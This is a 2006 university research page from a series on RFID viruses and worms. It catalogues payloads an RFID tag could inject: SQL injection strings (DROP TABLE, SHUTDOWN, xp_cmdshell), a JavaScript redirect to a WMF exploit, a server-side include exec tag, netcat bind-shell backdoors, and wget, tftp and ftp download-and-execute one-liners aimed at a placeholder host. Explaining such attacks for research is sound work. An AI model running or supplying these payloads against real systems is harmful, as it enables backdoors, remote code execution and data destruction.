logo
Go to the homepage of the Vrije Universiteit. Go to the homepage of the faculty of sciences.

Payloads


This page describes the different payloads that can be inserted into viruses and other attacks.

Destroying Data Using SQL Injection


Using standard SQL, it is possible to destroy parts of the database, or the entire database, if the RFID middleware has enough permissions on the database. For example, using the DROP TABLE or DROP DATABASE commands, a single table, or the entire database can be destroyed. Many databases also provide IF ... THEN ... constructs and date functions, which can be used to destroy the database at a predetermined time, allowing the virus to spread to other databases first.

Denial of Service Using SQL Injection


System-management functions provided by databases can also be used to cause problems. For example, Microsoft's SQL Server provides the SHUTDOWN function, which allows the database to be shut down from SQL.

Reading Data from the Database


If a query similar to Query  1 is used to write the tag's data to the database,

UPDATE ContainerContents SET OldContents='%contents%' WHERE TagID='%id%'
Query  1 - Updating known contents
the data in Exploit  1 can be used to issue a SELECT query on the database.
'|| (SELECT ...) ||'
Exploit  1 - SELECT query
In this case, the quotes perform the SQL injection and cause the data to be interpreted as code. The || operator performs string concatenation, causing the result of the SELECT query to be added to the field in the database. The string concatenation operator is required, because the quotes from the original query must be used. It is not possible to use a concatenation function, as the original quotes occur before and after the exploit, which makes it impossible to use them as parameters to the function.

Executing Shell Commands Using SQL Injection


SQL Server provides the xp_cmdshell procedure, which allows shell commands to be executed.
EXEC Master..xp_cmdshell 'commands';
Exploit  2 - Executing shell commands
In a default setup, only administrators are allowed to use this function, though other users may be granted explicit access.

Client-Side Scripting


The damage that can be done using client-side scripting languages is limited, as the functionality that browsers provide is limited. A functionality that all browsers do provide, is the ability to navigate to a URL specified from JavaScript. This can be used to direct the browser to a page containing malicious content, such as an image containing an exploit of the recently discovered WMF-bug, as shown in Exploit  3.
document.location='http://ip/exploit.wmf';
Exploit  3 - Using client-side scripting to exploit WMF-bug

Server-Side Includes


Server-side includes provide the ability to include the output from an executable file in a webpage, using the exec tag shown in Tag  1.
<!--#exec cmd=""-->
Tag  1 - Exec tag

In some systems, such as the Apache webserver on Linux, the specified command is passed to a new instance of the shell, which allows shell commands to be executed. On other systems, such as Apache on Windows, it is only allowed to specify the path of an executable, without parameters. For such systems, we have not found any malicious payloads.


Backdoors Using Shell Commands


Apart from the obvious commands such as rm, commands like netcat can be used to create backdoors. netcat listens on a TCP-port and prints the data that is received. This data can be passed to an instance of the shell, which causes them to be executed, as in the following example:
netcat -lp1234|sh
Exploit  4 - Shell backdoor
which listens on port 1234.

Another system utility that is useful is screen. This creates an instance of the shell and detaches it from its terminal, so that it runs as a daemon process. Combined with the ability to specify the shell's command on the command-line, this allows a more advanced backdoor, as in Exploit  5.

screen -dmS t bash -c"while [ true ]; do netcat -lp1234|sh; done"
Exploit  5 - Shell backdoor as a daemon

This exploit runs the previous exploit in a infinite loop, which allows the attacker to connect to the backdoor multiple times.


Executing Code Using Shell Commands


Another favorite is the wget utility. It downloads a file from a web- or ftp-server and stores it on the local filesystem. It can be used to download a program written by the attacker, which can then be executed.
wget http://ip/myexploit -O /tmp/myexploit; chmod +x /tmp/myexploit; /tmp/myexploit
Exploit  6 - Using wget to download and execute code on Linux

wget is usually not available on Windows systems. In this case, the tftp utility can be used, as in Exploit  7.

tftp -i ip GET myexploit.exe & myexploit
Exploit  7 - Using tftp to download and execute code on Windows

The ftp utility can also be used. It allows all the commands to be specified in a text file. The text file can be created on the fly using the echo utility.

(echo anonymous & echo BIN & echo GET myexploit.exe & echo quit) > ftp.txt & ftp -s:ftp.txt ip & myexploit
Exploit  8 - Using ftp to download and execute code on Windows

Binary Code


If binary code can be injected, the only limit on what can be achieved is the size of the RFID tag, though even with a tag of 1 Kb, a lot of damage can be done. One of the ways tags with limited size can be used is to pass a shell command to a function like C's system function, which executes the command in a new instance of the shell. Because of the rich set of utilities that many systems provide, a shell command can do a lot of damage with a limited amount of memory.

Previous How to Write an RFID Virus
Up RFID Viruses and Worms
How to Write an RFID Worm Next

Last modified: Thursday, 02 March 2006 15:46, CET
If you spot a mistake, please e-mail the maintainer of this page.
Your browser does not fully support CSS. This may result in visual artifacts.